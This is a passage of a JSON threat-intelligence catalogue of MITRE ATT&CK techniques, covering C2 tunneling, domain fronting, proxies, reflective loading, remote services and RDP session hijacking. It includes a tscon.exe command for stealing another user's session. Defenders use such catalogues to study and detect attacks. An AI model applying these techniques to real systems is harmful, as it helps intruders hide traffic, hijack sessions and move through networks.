infrastructure may be encapsulated within encrypted HTTPS packets.<sup>[[BleepingComp Godlua JUL19](https://app.tidalcyber.com/references/fd862d10-79bc-489d-a552-118014d01648)]</sup> \n\nAdversaries may also leverage [Protocol Tunneling](https://app.tidalcyber.com/technique/bd677092-d197-4230-b94a-438cb24260fd) in conjunction with [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) and/or [Protocol Impersonation](https://app.tidalcyber.com/technique/eb15320a-cd24-45b2-b23f-05ef8daf1039) to further conceal C2 communications and infrastructure. ",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "bd677092-d197-4230-b94a-438cb24260fd",
"value": "Protocol Tunneling"
},
{
"description": "Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. <sup>[[Fifield Blocking Resistent Communication through domain fronting 2015](https://app.tidalcyber.com/references/52671075-c425-40c7-a49a-b75e44a0c58a)]</sup> Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).\n\nFor example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1090.004"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "12a5e66d-6a21-4e75-a201-97235698d67d",
"value": "Domain Fronting"
},
{
"description": "Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://app.tidalcyber.com/software/b98d9fe7-9aa3-409a-bf5c-eadb01bac948), ZXProxy, and ZXPortMap. <sup>[[Trend Micro APT Attack Tools](https://app.tidalcyber.com/references/dac5cda3-97bc-4e38-b54f-554a75a18c5b)]</sup> Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.\n\nExternal connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1090.002"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "4c2c7469-0dbc-410f-891b-1040d4f2ff0b",
"value": "External Proxy"
},
{
"description": "Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://app.tidalcyber.com/software/b98d9fe7-9aa3-409a-bf5c-eadb01bac948), ZXProxy, and ZXPortMap. <sup>[[Trend Micro APT Attack Tools](https://app.tidalcyber.com/references/dac5cda3-97bc-4e38-b54f-554a75a18c5b)]</sup> Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.\n\nBy using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1090.001"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "8b744bfc-6bfb-45c5-8bb8-5b736ce7e634",
"value": "Internal Proxy"
},
{
"description": "To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. <sup>[[Onion Routing](https://app.tidalcyber.com/references/0667caad-39cd-469b-91c0-1210c09e6041)]</sup>\n\nIn the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise. By leveraging [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network. This method is dependent upon the [Network Boundary Bridging](https://app.tidalcyber.com/technique/091282d8-ef05-487f-93aa-445efaeed71b) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organizations WAN. Protocols such as ICMP may be used as a transport.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1090.003"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "fa05c148-56a0-43ae-b8e4-2d4e91641400",
"value": "Multi-hop Proxy"
},
{
"description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://app.tidalcyber.com/software/b98d9fe7-9aa3-409a-bf5c-eadb01bac948), ZXProxy, and ZXPortMap. <sup>[[Trend Micro APT Attack Tools](https://app.tidalcyber.com/references/dac5cda3-97bc-4e38-b54f-554a75a18c5b)]</sup> Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
},
{
"dest-uuid": "12a5e66d-6a21-4e75-a201-97235698d67d",
"type": "similar"
},
{
"dest-uuid": "4c2c7469-0dbc-410f-891b-1040d4f2ff0b",
"type": "similar"
},
{
"dest-uuid": "8b744bfc-6bfb-45c5-8bb8-5b736ce7e634",
"type": "similar"
},
{
"dest-uuid": "fa05c148-56a0-43ae-b8e4-2d4e91641400",
"type": "similar"
}
],
"uuid": "ba6a869a-c870-4be6-bc08-e078f0efdc3b",
"value": "Proxy"
},
{
"description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\n\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security.<sup>[[Wikipedia Windows Registry](https://app.tidalcyber.com/references/656f0ffd-33e0-40ef-bdf7-70758f855f18)]</sup> Information can easily be queried using the [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://app.tidalcyber.com/technique/58722f84-b119-45a8-8e29-0065688015ee) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "58722f84-b119-45a8-8e29-0065688015ee",
"value": "Query Registry"
},
{
"description": "Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).<sup>[[Introducing Donut](https://app.tidalcyber.com/references/8fd099c6-e002-44d0-8b7f-65f290a42c07)]</sup><sup>[[S1 Custom Shellcode Tool](https://app.tidalcyber.com/references/f49bfd00-48d5-4d84-a7b7-cb23fcdf861b)]</sup><sup>[[Stuart ELF Memory](https://app.tidalcyber.com/references/402745e1-a65a-4fa1-a86d-99b37221095c)]</sup><sup>[[00sec Droppers](https://app.tidalcyber.com/references/7569e79b-5a80-4f42-b467-8548cc9fc319)]</sup><sup>[[Mandiant BYOL](https://app.tidalcyber.com/references/445efe8b-659a-4023-afc7-aa7cd21ee5a1)]</sup>\n\nReflective code injection is very similar to [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) except that the “injection” loads code into the processes own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.<sup>[[Stuart ELF Memory](https://app.tidalcyber.com/references/402745e1-a65a-4fa1-a86d-99b37221095c)]</sup><sup>[[00sec Droppers](https://app.tidalcyber.com/references/7569e79b-5a80-4f42-b467-8548cc9fc319)]</sup><sup>[[Intezer ACBackdoor](https://app.tidalcyber.com/references/e6cb833f-cf18-498b-a233-848853423412)]</sup><sup>[[S1 Old Rat New Tricks](https://app.tidalcyber.com/references/20ef3645-fb92-4e13-a5a8-99367869bcba)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "ef85800b-080d-4739-9f3b-91b61314a93e",
"value": "Reflective Code Loading"
},
{
"description": "An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.<sup>[[Symantec Living off the Land](https://app.tidalcyber.com/references/4bad4659-f501-4eb6-b3ca-0359e3ba824e)]</sup><sup>[[CrowdStrike 2015 Global Threat Report](https://app.tidalcyber.com/references/50d467da-286b-45f3-8d5a-e9d8632f7bf1)]</sup><sup>[[CrySyS Blog TeamSpy](https://app.tidalcyber.com/references/f21ea3e2-7983-44d2-b78f-80d84bbc4f52)]</sup>\n\nRemote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.\n \nAdversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.\n\nInstallation of many remote access software may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://app.tidalcyber.com/technique/31c6dd3c-3eb2-46a9-ab85-9e8e145810a1)).",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "acf828f4-7e7e-43e1-bf15-ceab42021430",
"value": "Remote Access Software"
},
{
"description": "Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) that are synchronized with or federated to on-premises user identities. The adversary may then perform management actions or access cloud-hosted resources as the logged-on user. \n\nMany enterprises federate centrally managed user identities to cloud services, allowing users to login with their domain credentials in order to access the cloud control plane. Similarly, adversaries may connect to available cloud services through the web console or through the cloud command line interface (CLI) (e.g., [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5)), using commands such as <code>Connect-AZAccount</code> for Azure PowerShell, <code>Connect-MgGraph</code> for Microsoft Graph PowerShell, and <code>gcloud auth login</code> for the Google Cloud CLI.\n\nIn some cases, adversaries may be able to authenticate to these services via [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc) instead of a username and password. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1021.007"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
}
],
"uuid": "351a3ac7-bf0f-5dc1-b090-5a3d3586f31d",
"value": "Cloud Services"
},
{
"description": "Adversaries may leverage [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to log directly into accessible cloud hosted compute infrastructure through cloud native methods. Many cloud providers offer interactive connections to virtual infrastructure that can be accessed through the [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5), such as Azure Serial Console<sup>[[Azure Serial Console](https://app.tidalcyber.com/references/fd75d136-e818-5233-b2c2-5d8ed033b9e6)]</sup>, AWS EC2 Instance Connect<sup>[[EC2 Instance Connect](https://app.tidalcyber.com/references/deefa5b7-5a28-524c-b500-bc5574aa9920)]</sup><sup>[[lucr-3: Getting SaaS-y in the cloud](https://app.tidalcyber.com/references/033e7c95-cded-5e51-9a9f-1c6038b0509f)]</sup>, and AWS System Manager.<sup>[[AWS System Manager](https://app.tidalcyber.com/references/a7813928-4351-54c5-a64e-61bd4689e93b)]</sup>.\n\nMethods of authentication for these connections can include passwords, application access tokens, or SSH keys. These cloud native methods may, by default, allow for privileged access on the host with SYSTEM or root level access. \n\nAdversaries may utilize these cloud native methods to directly access virtual infrastructure and pivot through an environment.<sup>[[SIM Swapping and Abuse of the Microsoft Azure Serial Console](https://app.tidalcyber.com/references/c596a0e0-6e9c-52e4-b1bb-9c0542f960f2)]</sup> These connections typically provide direct console access to the VM rather than the execution of scripts (i.e., [Cloud Administration Command](https://app.tidalcyber.com/technique/944a7b91-c58e-567d-9e2c-515b93713c50)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1021.008"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
}
],
"uuid": "852bc9a9-865f-59cd-9e81-bec6e8aa8b78",
"value": "Direct Cloud VM Connections"
},
{
"description": "Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.\n\nThe Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup><sup>[[Microsoft COM](https://app.tidalcyber.com/references/edcd917d-ca5b-4e5c-b3be-118e828abe97)]</sup>\n\nPermissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.<sup>[[Microsoft Process Wide Com Keys](https://app.tidalcyber.com/references/749d83a9-3c9f-42f4-b5ed-fa775b079716)]</sup> By default, only Administrators may remotely activate and launch COM objects through DCOM.<sup>[[Microsoft COM ACL](https://app.tidalcyber.com/references/88769217-57f1-46d4-977c-2cb2969db437)]</sup>\n\nThrough DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications<sup>[[Enigma Outlook DCOM Lateral Movement Nov 2017](https://app.tidalcyber.com/references/48c8b8c4-1ce2-4fbc-a95d-dc8b39304200)]</sup> as well as other Windows objects that contain insecure methods.<sup>[[Enigma MMC20 COM Jan 2017](https://app.tidalcyber.com/references/ecc1023d-ef37-46e3-8dce-8fd5bb6a10dc)]</sup><sup>[[Enigma DCOM Lateral Movement Jan 2017](https://app.tidalcyber.com/references/62a14d3b-c61b-4c96-ad28-0519745121e3)]</sup> DCOM can also execute macros in existing documents<sup>[[Enigma Excel DCOM Sept 2017](https://app.tidalcyber.com/references/953dc856-d906-4d87-a421-4e708f30208c)]</sup> and may also invoke [Dynamic Data Exchange](https://app.tidalcyber.com/technique/82497cfd-725e-42f8-aaa7-4e20878a6a13) (DDE) execution directly through a COM created instance of a Microsoft Office application<sup>[[Cyberreason DCOM DDE Lateral Movement Nov 2017](https://app.tidalcyber.com/references/6edb3d7d-6b74-4dc4-a866-b81b19810f97)]</sup>, bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a). <sup>[[MSDN WMI](https://app.tidalcyber.com/references/210ca539-71f6-4494-91ea-402a3e0e2a10)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1021.003"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
}
],
"uuid": "ebc5fabb-5634-49f2-8979-94ea98da114a",
"value": "Distributed Component Object Model"
},
{
"description": "Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n\nRemote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).<sup>[[TechNet Remote Desktop Services](https://app.tidalcyber.com/references/b8fc1bdf-f602-4a9b-a51c-fa49e70f24cd)]</sup> \n\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://app.tidalcyber.com/technique/9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba) or [Terminal Services DLL](https://app.tidalcyber.com/technique/ae967542-1f37-4eea-993d-fff3867f2aea) for Persistence.<sup>[[Alperovitch Malware](https://app.tidalcyber.com/references/b6635fd7-40ec-4481-bb0a-c1d3391854a7)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1021.001"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
}
],
"uuid": "f5fb86b6-abf0-4d44-b4a0-56f0636c24d2",
"value": "Remote Desktop Protocol"
},
{
"description": "Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.\n\nSMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.\n\nWindows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to remotely access a networked system over SMB,<sup>[[Wikipedia Server Message Block](https://app.tidalcyber.com/references/3ea03c65-12e0-4e28-bbdc-17bb8c1e1831)]</sup> to interact with systems using remote procedure calls (RPCs),<sup>[[TechNet RPC](https://app.tidalcyber.com/references/7eaa0fa8-953a-482e-8f6b-02607e928525)]</sup> transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8), [Service Execution](https://app.tidalcyber.com/technique/68427c7d-f65a-4545-abfd-13d69e5e50cf), and [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://app.tidalcyber.com/technique/33486e3e-1104-42d0-8053-34c8c9c4d10f) and certain configuration and patch levels.<sup>[[Microsoft Admin Shares](https://app.tidalcyber.com/references/68d23cb0-b812-4d77-a3aa-34e24a923a50)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1021.002"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
}
],
"uuid": "bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd",
"value": "SMB/Windows Admin Shares"
},
{
"description": "Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.\n\nSSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the users public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1021.004"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
}
],
"uuid": "7620ba3a-7877-4f87-90e3-588163ac0474",
"value": "SSH"
},
{
"description": "Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computers display by relaying the screen, mouse, and keyboard inputs over the network.<sup>[[The Remote Framebuffer Protocol](https://app.tidalcyber.com/references/4c75a00d-aa90-4260-ab7a-2addc17d1728)]</sup>\n\nVNC differs from [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.<sup>[[MacOS VNC software for Remote Desktop](https://app.tidalcyber.com/references/c1f7fb59-6e61-4a7f-b14d-a3d1d3da45af)]</sup><sup>[[VNC Authentication](https://app.tidalcyber.com/references/de6e1202-19aa-41af-8446-521abc20200d)]</sup>\n\nAdversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.<sup>[[Hijacking VNC](https://app.tidalcyber.com/references/7a58938f-058b-4c84-aa95-9c37dcdda1fb)]</sup><sup>[[macOS root VNC login without authentication](https://app.tidalcyber.com/references/4dc6ea85-a41b-4218-a9ae-e1eea841f2f2)]</sup><sup>[[VNC Vulnerabilities](https://app.tidalcyber.com/references/3ec5440a-cb3b-4aa9-8e0e-0f92525ef51c)]</sup><sup>[[Offensive Security VNC Authentication Check](https://app.tidalcyber.com/references/90a5ab3c-c2a8-4b02-9bd7-628672907737)]</sup><sup>[[Attacking VNC Servers PentestLab](https://app.tidalcyber.com/references/f953ea41-f9ca-4f4e-a46f-ef1d2def1d07)]</sup><sup>[[Havana authentication bug](https://app.tidalcyber.com/references/255181c2-b1c5-4531-bc16-853f21bc6435)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1021.005"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
}
],
"uuid": "af7afc1e-3374-4d1c-917b-c47c305274f5",
"value": "VNC"
},
{
"description": "Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\n\nWinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).<sup>[[Microsoft WinRM](https://app.tidalcyber.com/references/ddbe110c-88f1-4774-bcb9-cd18b6218fc4)]</sup> It may be called with the `winrm` command or by any number of programs such as PowerShell.<sup>[[Jacobsen 2014](https://app.tidalcyber.com/references/f9ca049c-5cab-4d80-a84b-1695365871e3)]</sup> WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a).<sup>[[MSDN WMI](https://app.tidalcyber.com/references/210ca539-71f6-4494-91ea-402a3e0e2a10)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1021.006"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
}
],
"uuid": "c2866fd3-754e-4b40-897a-e73a8c1fcf7b",
"value": "Windows Remote Management"
},
{
"description": "Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\n\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).<sup>[[SSH Secure Shell](https://app.tidalcyber.com/references/ac5fc103-1946-488b-8af5-eda0636cbdd0)]</sup><sup>[[TechNet Remote Desktop Services](https://app.tidalcyber.com/references/b8fc1bdf-f602-4a9b-a51c-fa49e70f24cd)]</sup> They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain. \n\nLegitimate applications (such as [Software Deployment Tools](https://app.tidalcyber.com/technique/1bcf9fb5-6848-44d9-b394-ffbd3c357058) and other administrative programs) may utilize [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://app.tidalcyber.com/technique/af7afc1e-3374-4d1c-917b-c47c305274f5) to send the screen and control buffers and [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474) for secure file transfer.<sup>[[Remote Management MDM macOS](https://app.tidalcyber.com/references/e5f59848-7014-487d-9bae-bed81af1b72b)]</sup><sup>[[Kickstart Apple Remote Desktop commands](https://app.tidalcyber.com/references/f26542dd-aa61-4d2a-a05a-8f9674b49f82)]</sup><sup>[[Apple Remote Desktop Admin Guide 3.3](https://app.tidalcyber.com/references/c57c2bba-a398-4e68-b2a7-fddcf0740b61)]</sup> Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.<sup>[[FireEye 2019 Apple Remote Desktop](https://app.tidalcyber.com/references/bbc72952-988e-4c3c-ab5e-75b64e9e33f5)]</sup><sup>[[Lockboxx ARD 2019](https://app.tidalcyber.com/references/159f8495-5354-4b93-84cb-a25e56fcff3e)]</sup><sup>[[Kickstart Apple Remote Desktop commands](https://app.tidalcyber.com/references/f26542dd-aa61-4d2a-a05a-8f9674b49f82)]</sup>",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
},
{
"dest-uuid": "351a3ac7-bf0f-5dc1-b090-5a3d3586f31d",
"type": "similar"
},
{
"dest-uuid": "852bc9a9-865f-59cd-9e81-bec6e8aa8b78",
"type": "similar"
},
{
"dest-uuid": "ebc5fabb-5634-49f2-8979-94ea98da114a",
"type": "similar"
},
{
"dest-uuid": "f5fb86b6-abf0-4d44-b4a0-56f0636c24d2",
"type": "similar"
},
{
"dest-uuid": "bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd",
"type": "similar"
},
{
"dest-uuid": "7620ba3a-7877-4f87-90e3-588163ac0474",
"type": "similar"
},
{
"dest-uuid": "af7afc1e-3374-4d1c-917b-c47c305274f5",
"type": "similar"
},
{
"dest-uuid": "c2866fd3-754e-4b40-897a-e73a8c1fcf7b",
"type": "similar"
}
],
"uuid": "30ef3f13-5e9b-4712-9adf-f0da4ef157a1",
"value": "Remote Services"
},
{
"description": "Adversaries may hijack a legitimate users remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).<sup>[[TechNet Remote Desktop Services](https://app.tidalcyber.com/references/b8fc1bdf-f602-4a9b-a51c-fa49e70f24cd)]</sup>\n\nAdversaries may perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\\windows\\system32\\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user.<sup>[[RDP Hijacking Korznikov](https://app.tidalcyber.com/references/8877e1f3-11e6-4ae0-adbd-c9b98b07ee25)]</sup> This can be done remotely or locally and with active or disconnected sessions.<sup>[[RDP Hijacking Medium](https://app.tidalcyber.com/references/0a615508-c155-4004-86b8-916bbfd8ae42)]</sup> It can also lead to [Remote System Discovery](https://app.tidalcyber.com/technique/00a9a4d4-928d-4d95-be31-dfac6103991f) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. 